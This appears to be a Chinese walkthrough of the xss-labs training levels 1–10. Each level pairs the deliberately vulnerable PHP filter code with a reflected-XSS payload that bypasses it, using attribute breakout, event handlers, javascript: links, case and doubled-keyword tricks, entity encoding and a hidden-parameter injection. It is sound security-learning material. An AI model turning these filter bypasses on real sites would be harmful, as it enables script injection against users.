level1
这一关很简单,标准的xss注入,打开hackbar,输入
<script>alert(/xss/)</script>点击EXECUTE,通关!
level 2
这一关有一个搜索框,输入
<script>alert(/xss/)</script>发现直接将这段JS代码当做HTML实体,即普通字符
查看源代码,发现有htmlspecialchars() 函数,会转换双引号、单引号和尖角号成HTML实体,并发现在输出中Value的形式是双引号闭合后接尖角号:
这时候要尝试将该语句提前闭合,才能执行我们的弹窗命令,输入:
"> <script>alert(/xss/)</script>在源代码中相当于:
<input name=keyword value="' "> <script>alert(/xss/)</script>'">在搜索框中输入该JS语句,通关成功:
level 3
和第二关类似,进行代码审计:
<?php ini_set("display_errors", 0);$str = $_GET["keyword"];echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center><form action=level3.php method=GET><input name=keyword value='".htmlspecialchars($str)."'><input type=submit name=submit value=搜索 /></form></center>";?>代码中用单引号闭合,用onmousemove 事件(onmousemove 事件当指针在元素上移动时发生 。)进行xss注入,在搜索框中输入下面语句:
'onmouseover='alert(/xss/)移动鼠标后通关:
level 4
进行代码审计:
<?php ini_set("display_errors", 0);$str = $_GET["keyword"];$str2=str_replace(">","",$str);$str3=str_replace("<","",$str2);echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center><form action=level4.php method=GET><input name=keyword value="'.$str3.'"><input type=submit name=submit value=搜索 /></form></center>';?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
发现这段代码将尖角号替换成空,value用双引号闭合,只要将第三关的代码单引号改成双引号,就能注入成功
"onmouseover="alert(/xss/)通关成功:
level 5
进行代码审计:
<?php ini_set("display_errors", 0);$str = strtolower($_GET["keyword"]);$str2=str_replace("<script","<scr_ipt",$str);$str3=str_replace("on","o_n",$str2);echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center><form action=level5.php method=GET><input name=keyword value="'.$str3.'"><input type=submit name=submit value=搜索 /></form></center>';?>发现这段代码将<script、on进行过滤替换,并且用htmlspecialchars()函数将单双引号<,>转换成HTML实体,输出用双引号闭合,而且有strtolower大小写转换,因此可以考虑JavaScript伪标签与a标签一起使用,并用第二关的方法让标签提前关闭,就能通过此关。
输入代码:
"> <a href=javascript:alert(/xss/) > 点击我</a> //出现一个伪链接:
点击后通关成功:
level 6
进行代码审计:
<?php ini_set("display_errors", 0);$str = $_GET["keyword"];$str2=str_replace("<script","<scr_ipt",$str);$str3=str_replace("on","o_n",$str2);$str4=str_replace("src","sr_c",$str3);$str5=str_replace("data","da_ta",$str4);$str6=str_replace("href","hr_ef",$str5);echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center><form action=level6.php method=GET><input name=keyword value="'.$str6.'"><input type=submit name=submit value=搜索 /></form></center>';?>发现第六关将<script、on、src、data、href等关键词都进行了过滤替换,并用htmlspecialchars函数将特殊字符进行了一次转换,但没有过滤大小写,将第五关的代码修改后写入:
"> <a hRef=javascript:alert(/xss/) > 点击我</a> //或者也可以用下面代码,只需要大小写绕过即可:
"Onmouseover="alert(/xss/) "> <Script>alert(/xss/)</script>出现了一个伪链接:
点击后通关:
level 7
进行代码审计:
<?php ini_set("display_errors", 0);$str =strtolower( $_GET["keyword"]);$str2=str_replace("script","",$str);$str3=str_replace("on","",$str2);$str4=str_replace("src","",$str3);$str5=str_replace("data","",$str4);$str6=str_replace("href","",$str5);echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center><form action=level7.php method=GET><input name=keyword value="'.$str6.'"><input type=submit name=submit value=搜索 /></form></center>';?>发现这一关不觉得,不仅将关键词全部过滤,还自带大写转小写,那这怎么做呢?只要在代码中多加几个字母,让它把多余的字母替换成空格,就变成我们想要的了:
"> <sscriptcript>alert(/xss/)</sscriptcript>或
"oonnmouseover='alert(/xss/)'输入到搜索框后通过成功:
level 8
进行代码审计:
<?php ini_set("display_errors", 0);$str = strtolower($_GET["keyword"]);$str2=str_replace("script","scr_ipt",$str);$str3=str_replace("on","o_n",$str2);$str4=str_replace("src","sr_c",$str3);$str5=str_replace("data","da_ta",$str4);$str6=str_replace("href","hr_ef",$str5);$str7=str_replace('"','"',$str6);echo '<center><form action=level8.php method=GET><input name=keyword value="'.htmlspecialchars($str).'"><input type=submit name=submit value=添加友情链接 /></form></center>';?>这一关不仅做了大小写转换、关键词过滤甚至双引号的过滤,下面有一个名叫友情链接的超链接,前面的操作都不能用了,但是没关系,可以将部分代码变成HTML的转义序列:
javascript:alert(/xss/)转码成&#x加16进制数字的方式书写(HTML的转义序列),也可以被HTML识别:
javascript:alert(/xss/)输入搜索框后点击添加友情链接:
点击下面的友情链接后通过成功:
level9
进行代码审计:
<?php ini_set("display_errors", 0);$str = strtolower($_GET["keyword"]);$str2=str_replace("script","scr_ipt",$str);$str3=str_replace("on","o_n",$str2);$str4=str_replace("src","sr_c",$str3);$str5=str_replace("data","da_ta",$str4);$str6=str_replace("href","hr_ef",$str5);$str7=str_replace('"','"',$str6);echo '<center><form action=level9.php method=GET><input name=keyword value="'.htmlspecialchars($str).'"><input type=submit name=submit value=添加友情链接 /></form></center>';?><?phpif(false===strpos($str7,'http://')){ echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>'; }else{ echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';}?><center><img src=level9.png></center>跟第八关非常相似,只不过多了一个判断链接是否合法的if语句,要求合法的链接必须有http://,只需要在第八关的代码基础上加上http://即可,由于http://中有了/,所以把xss的/改成单引号:
javascript:alert('xsshttp://')通关成功:
level 10
进行代码审计:
?php ini_set("display_errors", 0);$str = $_GET["keyword"];$str11 = $_GET["t_sort"];$str22=str_replace(">","",$str11);$str33=str_replace("<","",$str22);echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center><form id=search><input name="t_link" value="'.'" type="hidden"><input name="t_history" value="'.'" type="hidden"><input name="t_sort" value="'.$str33.'" type="hidden"></form></center>';?>发现源码中有个参数t_sort,只做><号的转换和过滤,然后输出值在value中,我们可以先将它闭合,然后用type=“text”将前面的字段类型设为文本,再用一个onmouseover事件:
&t_sort=" type="text" onmouseover="alert(/xss/)执行后源码的t_sort段会变成这样:
移动鼠标后过关成功:
